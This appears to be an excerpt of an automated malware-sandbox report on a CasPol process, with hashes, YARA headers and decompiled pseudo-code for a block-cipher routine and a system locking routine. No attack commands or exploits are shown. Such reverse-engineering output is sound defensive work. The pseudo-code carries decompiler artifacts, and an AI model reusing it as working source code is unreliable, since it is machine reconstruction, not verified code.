                                                                        • Opcode ID: ff7c511392a6ffa415fe1f59e6b9120c245740c9ec3ffb561791493281442292
                                                                        • Instruction ID: ffb97af81f3ed23742408a1bc7756201f9019d11d1f0a47a2b7e84ed95c37454
                                                                        • Opcode Fuzzy Hash: ff7c511392a6ffa415fe1f59e6b9120c245740c9ec3ffb561791493281442292
                                                                        • Instruction Fuzzy Hash: 60F18C766082118FC725CF19D480A7AB7F1AF88718F44892EF986DBB60E734D895CB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004057D3 Relevance: .4, Instructions: 435COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 25%
                                                                        			E004057D3(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t283;
				signed int* _t359;
				signed int _t385;
				signed int* _t411;
				signed int _t431;
				signed int _t460;
				signed int _t480;
				signed int _t562;
				signed int _t606;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t460 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t460;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t283 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t283;
				_t431 =  *(__eax + 4 + (_t283 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t460 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t606 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t283 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t460 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t460 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t411 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t411 - 4);
				_t480 = (_a4 >> 1) - 1;
				_a4 = _t480;
				if(_t480 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t606 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t431 >> 0x00000018 & 0x000000ff) * 4) ^  *_t411;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t431 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t606 >> 0x00000018 & 0x000000ff) * 4) ^ _t411[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t385 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t431 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t606 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t411[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t385;
						_t562 =  *(__eax + 4 + (_t606 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t431 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t411[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t431 =  *(__eax + 4 + (_t385 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t562 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t411[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t606 =  *(__eax + 4 + (_t562 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t385 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t411[5];
						_v12 = _t562;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t562 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t411[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t411 =  &(_t411[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t411 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t431 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t606 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t411) & 0xff00ff00 | (( *(_t273 + 4 + (_t431 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t606 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t411) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t606 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t431 & 0x000000ff) * 4) & 0x000000ff ^ _t411[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t606 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t431 & 0x000000ff) * 4) & 0x000000ff ^ _t411[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t359 = _a8;
				_t359[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t431 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t606 & 0x000000ff) * 4) & 0x000000ff ^ _t411[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t431 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t606 & 0x000000ff) * 4) & 0x000000ff ^ _t411[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t359[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t431 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t606 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t411[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t431 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t606 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t411[3]) & 0x00ff00ff;
				asm("in eax, 0x5d");
				return _t274;
			}



















                                                                        0x004057d3
                                                                        0x004057e2
                                                                        0x004057eb
                                                                        0x004057f9
                                                                        0x004057fd
                                                                        0x00405806
                                                                        0x00405817
                                                                        0x0040581a
                                                                        0x0040581f
                                                                        0x00405828
                                                                        0x00405836
                                                                        0x0040583b
                                                                        0x00405844
                                                                        0x00405854
                                                                        0x00405874
                                                                        0x00405877
                                                                        0x00405889
                                                                        0x0040588e
                                                                        0x004058a3
                                                                        0x004058c0
                                                                        0x004058c3
                                                                        0x004058d4
                                                                        0x004058e9
                                                                        0x00405909
                                                                        0x0040590c
                                                                        0x0040591e
                                                                        0x0040593c
                                                                        0x00405959
                                                                        0x0040595c
                                                                        0x0040596e
                                                                        0x00405983
                                                                        0x00405989
                                                                        0x00405991
                                                                        0x00405992
                                                                        0x00405995
                                                                        0x004059a3
                                                                        0x004059b3
                                                                        0x004059c5
                                                                        0x004059d7
                                                                        0x004059f3
                                                                        0x00405a06
                                                                        0x00405a13
                                                                        0x00405a24
                                                                        0x00405a3b
                                                                        0x00405a5d
                                                                        0x00405a60
                                                                        0x00405a71
                                                                        0x00405a8c
                                                                        0x00405aa3
                                                                        0x00405aa6
                                                                        0x00405ab8
                                                                        0x00405ac0
                                                                        0x00405ad5
                                                                        0x00405af2
                                                                        0x00405af5
                                                                        0x00405b06
                                                                        0x00405b2a
                                                                        0x00405b3a
                                                                        0x00405b3d
                                                                        0x00405b4f
                                                                        0x00405b67
                                                                        0x00405b6a
                                                                        0x00405b7d
                                                                        0x00405b8a
                                                                        0x00405b9c
                                                                        0x00405bb4
                                                                        0x00405bd7
                                                                        0x00405bda
                                                                        0x00405bec
                                                                        0x00405c01
                                                                        0x00405c07
                                                                        0x00405c07
                                                                        0x00405c0a
                                                                        0x00405c0a
                                                                        0x004059a3
                                                                        0x00405c6e
                                                                        0x00405c77
                                                                        0x00405c85
                                                                        0x00405ce3
                                                                        0x00405cec
                                                                        0x00405cfa
                                                                        0x00405d5c
                                                                        0x00405d65
                                                                        0x00405d72
                                                                        0x00405d75
                                                                        0x00405dc1
                                                                        0x00405dcd
                                                                        0x00405dd6
                                                                        0x00405de3
                                                                        0x00405de8
                                                                        0x00405dea

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                        • Instruction ID: b48a8abfd398b33141c675c61473ff866cda4f087bcb68e308b342261f2062df
                                                                        • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                        • Instruction Fuzzy Hash: 13026E73E547164FE720DE4ACDC4725B3A3EFC8311F5B81B8CA142B613CA39BA525A90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013E20A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E013E20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x14a8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E013E2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E013E2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E013B58EC(_t240);
									_t221 =  *0x14a5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x14a5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E013F4A2C(0x14a6e40, 0x13f4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E013D7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1395c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E013EF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E013EF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01437016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L013D2400(_t267 + 0x20);
															}
															L013D2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E013E2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E013D2280(_t134, 0x14a8608);
									__eflags =  *0x14a6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E013CFFB0(_t198, _t241, 0x14a8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x14a6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x14a8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E013E6B90(_t210,  &_v64);
										_t262 =  *0x14a8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E013EE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E013F97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E013F006A(0x14a8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x14a8608);
												E013FB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x14a6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x14a6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E013CFFB0(_t198, _t240, 0x14a8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E013F00C2(0x14a8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                                        0x013e20a0
                                                                        0x013e20a8
                                                                        0x013e20ad
                                                                        0x013e20b3
                                                                        0x013e20b8
                                                                        0x013e20c2
                                                                        0x013e20c7
                                                                        0x013e20cb
                                                                        0x013e20d2
                                                                        0x013e2263
                                                                        0x013e2266
                                                                        0x01425836
                                                                        0x01425836
                                                                        0x00000000
                                                                        0x013e226c
                                                                        0x013e226c
                                                                        0x013e2270
                                                                        0x013e2274
                                                                        0x013e20e2
                                                                        0x013e20e2
                                                                        0x013e20e6
                                                                        0x013e20ee
                                                                        0x014257dc
                                                                        0x014257de
                                                                        0x014257ec
                                                                        0x014257ec
                                                                        0x014257f1
                                                                        0x014257f3
                                                                        0x014257f8
                                                                        0x00000000
                                                                        0x014257f8
                                                                        0x014257e0
                                                                        0x014257e4
                                                                        0x014257ea
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014257ea
                                                                        0x013e20f4
                                                                        0x013e20f4
                                                                        0x013e20f8
                                                                        0x013e20f8
                                                                        0x013e20fc
                                                                        0x013e2100
                                                                        0x013e2106
                                                                        0x013e2201
                                                                        0x013e2206
                                                                        0x013e220b
                                                                        0x013e220e
                                                                        0x013e22a9
                                                                        0x013e22ac
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e22b2
                                                                        0x013e22b5
                                                                        0x01425801
                                                                        0x01425806
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01425810
                                                                        0x01425815
                                                                        0x01425818
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0142581e
                                                                        0x013e22bb
                                                                        0x013e22bb
                                                                        0x013e2218
                                                                        0x013e2218
                                                                        0x013e221c
                                                                        0x013e2220
                                                                        0x013e2222
                                                                        0x013e22c2
                                                                        0x013e22c4
                                                                        0x013e22dc
                                                                        0x013e22dc
                                                                        0x013e22e1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e22e7
                                                                        0x013e22c8
                                                                        0x013e22cd
                                                                        0x013e22d3
                                                                        0x013e22d6
                                                                        0x01425823
                                                                        0x01425825
                                                                        0x01425827
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0142582d
                                                                        0x00000000
                                                                        0x0142582d
                                                                        0x00000000
                                                                        0x013e2228
                                                                        0x013e2228
                                                                        0x00000000
                                                                        0x013e2228
                                                                        0x013e2222
                                                                        0x013e2214
                                                                        0x013e2214
                                                                        0x00000000
                                                                        0x013e2114
                                                                        0x013e2114
                                                                        0x013e2114
                                                                        0x013e211a
                                                                        0x013e211c
                                                                        0x013e2348
                                                                        0x013e234d
                                                                        0x01425840
                                                                        0x01425845
                                                                        0x01425848
                                                                        0x0142584e
                                                                        0x0142584e
                                                                        0x01425848
                                                                        0x013e2353
                                                                        0x013e2355
                                                                        0x013e2388
                                                                        0x013e2388
                                                                        0x013e2368
                                                                        0x013e236a
                                                                        0x013e236c
                                                                        0x013e238f
                                                                        0x00000000
                                                                        0x013e236e
                                                                        0x013e236e
                                                                        0x013e218e
                                                                        0x013e218e
                                                                        0x013e2191
                                                                        0x013e2195
                                                                        0x01425a03
                                                                        0x01425a06
                                                                        0x01425a0c
                                                                        0x01425a0f
                                                                        0x01425a11
                                                                        0x01425a13
                                                                        0x01425a13
                                                                        0x01425a19
                                                                        0x01425a1f
                                                                        0x00000000
                                                                        0x013e219b
                                                                        0x013e219b
                                                                        0x013e21a0
                                                                        0x013e2282
                                                                        0x013e2284
                                                                        0x013e2284
                                                                        0x013e2284
                                                                        0x013e2284
                                                                        0x013e21a6
